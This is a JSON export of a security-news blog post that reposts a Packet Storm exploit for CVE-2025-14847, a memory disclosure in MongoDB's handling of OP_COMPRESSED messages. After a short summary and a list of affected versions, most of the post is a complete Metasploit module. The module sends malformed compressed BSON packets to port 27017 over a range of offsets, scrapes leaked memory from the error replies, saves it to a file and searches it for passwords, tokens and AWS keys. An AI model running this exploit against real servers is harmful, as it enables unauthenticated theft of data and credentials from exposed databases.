{"id":41166,"date":"2026-02-17T12:46:10","date_gmt":"2026-02-17T12:46:10","guid":{"rendered":"http:\/\/localhost\/?p=41166"},"modified":"2026-02-17T12:46:10","modified_gmt":"2026-02-17T12:46:10","slug":"mongodb-bson-decompression-opcompressed-memory-disclosure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41166","title":{"rendered":"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:15:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module demonstrates an educational memory leak in MongoDB BSON decompression. It sends malformed BSON in OPCOMPRESSED messages to trigger memory disclosure. Quite a huge list of versions are affected&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215727&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-14847&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : MongoDB BSON Decompression Memory Disclosure via OP_COMPRESSED                                                              |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.mongodb.com\/                                                                                                    |\\n    =============================================================================================================================================\\n    \\n    [+] Summary    : A memory disclosure vulnerability exists in MongoDB\u2019s handling of compressed wire protocol messages (OP_COMPRESSED). \\n                     The issue arises from improper bounds validation during BSON decompression, where a crafted message can declare a manipulated uncompressed size and BSON document length.\\n                     By sending a malformed OP_COMPRESSED packet containing a forged BSON length field and inconsistent decompression size, a remote unauthenticated \\n    \\t\\t\\t\\t attacker may trigger an out-of-bounds read condition. This can lead to unintended disclosure of memory contents through server error responses.\\n                     The vulnerability is remotely exploitable over the MongoDB service port (default: 27017) and does not require authentication under default configurations where the service is exposed.\\n    \\n    [+] Affected Versions :\\n    \\n    The vulnerability impacts the following MongoDB Server versions prior to patch releases:\\n    \\n    8.2.0 \u2192 8.2.2\\n    \\n    8.0.0 \u2192 8.0.16\\n    \\n    7.0.0 \u2192 7.0.27\\n    \\n    6.0.0 \u2192 6.0.26\\n    \\n    5.0.0 \u2192 5.0.31\\n    \\n    4.4.0 \u2192 4.4.29\\n    \\n    Older 4.2.x, 4.0.x, and 3.6.x branches (unpatched)\\n    \\n    Patched Versions\\n    \\n    The issue is fixed in:\\n    \\n    8.2.3\\n    \\n    8.0.17\\n    \\n    7.0.28\\n    \\n    6.0.27\\n    \\n    5.0.32\\n    \\n    4.4.30 and later\\n    \\n    [+] POC : \\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # PoC converted from Python to Metasploit Ruby module\\n    ##\\n    \\n    require &#8216;msf\/core&#8217;\\n    require &#8216;zlib&#8217;\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::Tcp\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;CVE-2025-14847 MongoDB Memory Leak&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module demonstrates an educational memory leak in MongoDB BSON decompression.\\n            It sends malformed BSON in OP_COMPRESSED messages to trigger memory disclosure.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [ &#8216;Antara Mane (Python PoC)&#8217;, &#8216;Indoushka&#8217; ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e\\n            [\\n              [ &#8216;CVE&#8217;, &#8216;2025-14847&#8217; ],\\n              [ &#8216;URL&#8217;, &#8216;https:\/\/example.com\/mongodb-leak&#8217; ]\\n            ],\\n          &#8216;Platform&#8217;       =\\u003e [&#8216;linux&#8217;,&#8217;win&#8217;],\\n          &#8216;Arch&#8217;           =\\u003e ARCH_CMD,\\n          &#8216;Targets&#8217;        =\\u003e\\n            [\\n              [ &#8216;Automatic&#8217;, {} ]\\n            ],\\n          &#8216;DefaultTarget&#8217;  =\\u003e 0,\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-01-01&#8217;\\n        ))\\n    \\n        register_options(\\n          [\\n            Opt::RPORT(27017),\\n            OptInt.new(&#8216;MIN_OFFSET&#8217;, [ true, &#8216;Minimum document length&#8217;, 20 ]),\\n            OptInt.new(&#8216;MAX_OFFSET&#8217;, [ true, &#8216;Maximum document length&#8217;, 8192 ]),\\n            OptString.new(&#8216;OUTPUT&#8217;, [ true, &#8216;File to save leaks&#8217;, &#8216;leaked.bin&#8217; ])\\n          ])\\n      end\\n    \\n      def send_probe(doc_len, buffer_size)\\n        content = \\&#8221;\\\\x10a\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\&#8221;  \\n        bson = [doc_len].pack(&#8216;\\u003ci&#8217;) + content\\n    \\n        op_msg = [0].pack(&#8216;\\u003cI&#8217;) + \\&#8221;\\\\x00\\&#8221; + bson\\n        compressed = Zlib::Deflate.deflate(op_msg)\\n    \\n        payload = [2013].pack(&#8216;\\u003cI&#8217;)          \\n        payload += [buffer_size].pack(&#8216;\\u003ci&#8217;)       \\n        payload += [2].pack(&#8216;C&#8217;)                  \\n        payload += compressed\\n    \\n        header = [\\n          16 + payload.length,  \\n          1,                   \\n          0,                  \\n          2012                  \\n        ].pack(&#8216;\\u003cIIII&#8217;)\\n    \\n        connect\\n        sock.put(header + payload)\\n        res = sock.get_once(-1, 2)\\n        disconnect\\n        res || &#8221;\\n      rescue\\n        &#8221;\\n      end\\n    \\n      def extract_leaks(response)\\n        return [] if response.nil? || response.length \\u003c 25\\n    \\n        leaks = []\\n    \\n        begin\\n          msg_len = response[0,4].unpack(&#8216;\\u003cI&#8217;)[0]\\n          if response[12,4].unpack(&#8216;\\u003cI&#8217;)[0] == 2012\\n            raw = Zlib::Inflate.inflate(response[25,msg_len-25])\\n          else\\n            raw = response[16,msg_len-16]\\n          end\\n        rescue\\n          return []\\n        end\\n    \\n        raw.scan(\/field name &#8216;([^&#8217;]*)&#8217;\/) do |m|\\n          data = m[0].to_s\\n          next if [&#8216;?&#8217;,&#8217;a&#8217;,&#8217;$db&#8217;,&#8217;ping&#8217;].include?(data)\\n          leaks \\u003c\\u003c data\\n        end\\n        raw.scan(\/type (\\\\d+)\/) do |m|\\n          leaks \\u003c\\u003c [m[0].to_i].pack(&#8216;C&#8217;)\\n        end\\n    \\n        leaks\\n      end\\n    \\n      def exploit\\n        print_status(\\&#8221;[*] mongobleed &#8211; CVE-2025-14847 MongoDB Memory Leak\\&#8221;)\\n        print_status(\\&#8221;[*] Target: #{rhost}:#{rport}\\&#8221;)\\n        print_status(\\&#8221;[*] Scanning offsets #{datastore[&#8216;MIN_OFFSET&#8217;]}-#{datastore[&#8216;MAX_OFFSET&#8217;]}\\&#8221;)\\n    \\n        all_leaked = &#8221;\\n        unique_leaks = {}\\n    \\n        (datastore[&#8216;MIN_OFFSET&#8217;]..datastore[&#8216;MAX_OFFSET&#8217;]).each do |doc_len|\\n          response = send_probe(doc_len, doc_len + 500)\\n          leaks = extract_leaks(response)\\n    \\n          leaks.each do |data|\\n            next if unique_leaks[data]\\n            unique_leaks[data] = true\\n            all_leaked \\u003c\\u003c data\\n    \\n            if data.length \\u003e 10\\n              preview = data[0,80].force_encoding(&#8216;utf-8&#8217;).encode(&#8216;utf-8&#8217;, invalid: :replace)\\n              print_good(\\&#8221;[+] offset=#{doc_len} len=#{data.length}: #{preview}\\&#8221;)\\n            end\\n          end\\n        end\\n    \\n        ::File.open(datastore[&#8216;OUTPUT&#8217;], &#8216;wb&#8217;) { |f| f.write(all_leaked) }\\n        print_status(\\&#8221;[*] Total leaked: #{all_leaked.length} bytes\\&#8221;)\\n        print_status(\\&#8221;[*] Unique fragments: #{unique_leaks.length}\\&#8221;)\\n        print_status(\\&#8221;[*] Saved to: #{datastore[&#8216;OUTPUT&#8217;]}\\&#8221;)\\n    \\n        secrets = [&#8216;password&#8217;,&#8217;secret&#8217;,&#8217;key&#8217;,&#8217;token&#8217;,&#8217;admin&#8217;,&#8217;AKIA&#8217;]\\n        secrets.each do |s|\\n          if all_leaked.downcase.include?(s.downcase)\\n            print_warning(\\&#8221;[!] Found pattern: #{s}\\&#8221;)\\n          end\\n        end\\n      end\\n    end\\n    \\n    \\t\\n    Greetings to :======================================================================\\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n    ====================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215727&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:N\/SI:N\/VA:N\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215727\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:15:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module demonstrates an educational memory leak in MongoDB BSON decompression. It sends malformed BSON in OPCOMPRESSED messages to trigger memory disclosure. Quite a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-41166","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41166\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:15:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module demonstrates an educational memory leak in MongoDB BSON decompression. It sends malformed BSON in OPCOMPRESSED messages to trigger memory disclosure. Quite a...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41166\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-17T12:46:10+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727\",\"datePublished\":\"2026-02-17T12:46:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166\"},\"wordCount\":997,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41166#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166\",\"name\":\"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-17T12:46:10+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41166\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41166#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41166","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:15:30&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module demonstrates an educational memory leak in MongoDB BSON decompression. It sends malformed BSON in OPCOMPRESSED messages to trigger memory disclosure. Quite a...","og_url":"https:\/\/zero.redgem.net\/?p=41166","og_site_name":"zero redgem","article_published_time":"2026-02-17T12:46:10+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41166#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41166"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727","datePublished":"2026-02-17T12:46:10+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41166"},"wordCount":997,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41166#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41166","url":"https:\/\/zero.redgem.net\/?p=41166","name":"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-17T12:46:10+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41166#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41166"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41166#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MongoDB BSON Decompression OP_COMPRESSED Memory Disclosure_PACKETSTORM:215727"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41166"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41166\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}